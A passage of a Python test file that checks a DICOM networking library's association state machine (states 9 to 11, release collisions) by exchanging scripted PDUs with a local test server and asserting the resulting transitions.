time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt17'
]
def test_evt18(self):
"""Test Sta9 + Evt18."""
# Sta9 + Evt18 -> <ignore> -> Sta9
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt18'
]
def test_evt19(self):
"""Test Sta9 + Evt19."""
# Sta9 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', b'\x08\x00\x00\x00\x00\x00'), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState10(TestStateBase):
"""Tests for State 10: Release collision acc - awaiting A-RELEASE-RP ."""
def test_evt01(self):
"""Test Sta10 + Evt1."""
# Sta10 + Evt1 -> <ignore> -> Sta10
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta10 + Evt2."""
# Sta10 + Evt2 -> <ignore> -> Sta10
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta10 + Evt3."""
# Sta10 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_ac), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt3', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta10 + Evt4."""
# Sta10 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rj), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt4', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta10 + Evt5."""
# Sta10 + Evt5 -> <ignore> -> Sta10
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta10 + Evt6."""
# Sta10 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rq), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt6', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta10 + Evt7."""
# Sta10 + Evt7 -> <ignore> -> Sta10
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt7'
]
def test_evt08(self):
"""Test Sta10 + Evt8."""
# Sta10 + Evt8 -> <ignore> -> Sta10
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt8'
]
def test_evt09(self):
"""Test Sta10 + Evt9."""
# Sta10 + Evt9 -> <ignore> -> Sta10
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt9'
]
def test_evt10(self):
"""Test Sta10 + Evt10."""
# Sta10 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', p_data_tf), # trigger event
('recv', a_abort), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt10', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta10 + Evt11."""
# Sta10 + Evt11 -> <ignore> -> Sta10
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt11'
]
def test_evt12(self):
"""Test Sta10 + Evt12."""
# Sta10 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rq), # trigger event
('recv', a_abort), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt12', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta10 + Evt13."""
# Sta10 + Evt13 -> AR-10 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-10: Issue A-RELEASE (rp) primitive
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp), # trigger event
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13'
]
def test_evt14(self):
"""Test Sta10 + Evt14."""
# Sta10 + Evt14 -> <ignore> -> Sta10
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt14'
]
def test_evt15(self):
"""Test Sta10 + Evt15."""
# Sta10 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt15', 'AA-1'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta10 + Evt16."""
# Sta10 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_abort), # trigger event
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt16', 'AA-3'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt16'
]
def test_evt17(self):
"""Test Sta10 + Evt17."""
# Sta10 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt17', 'AA-4'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt17'
]
def test_evt18(self):
"""Test Sta10 + Evt18."""
# Sta10 + Evt18 -> <ignore> -> Sta10
# Evt18: ARTIM timer expired from <local service>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.2),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt18'
]
def test_evt19(self):
"""Test Sta10 + Evt19."""
# Sta10 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'), # trigger event
('recv', a_abort), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt19', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState11(TestStateBase):
"""Tests for State 11: Release collision req - awaiting A-RELEASE-RP PDU"""
def test_evt01(self):
"""Test Sta11 + Evt1."""
# Sta11 + Evt1 -> <ignore> -> Sta11
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta11 + Evt2."""
# Sta11 + Evt2 -> <ignore> -> Sta11
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta11 + Evt3."""
# Sta11 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt3',
]
def test_evt04(self):
"""Test Sta11 + Evt4."""
# Sta11 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_rj),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
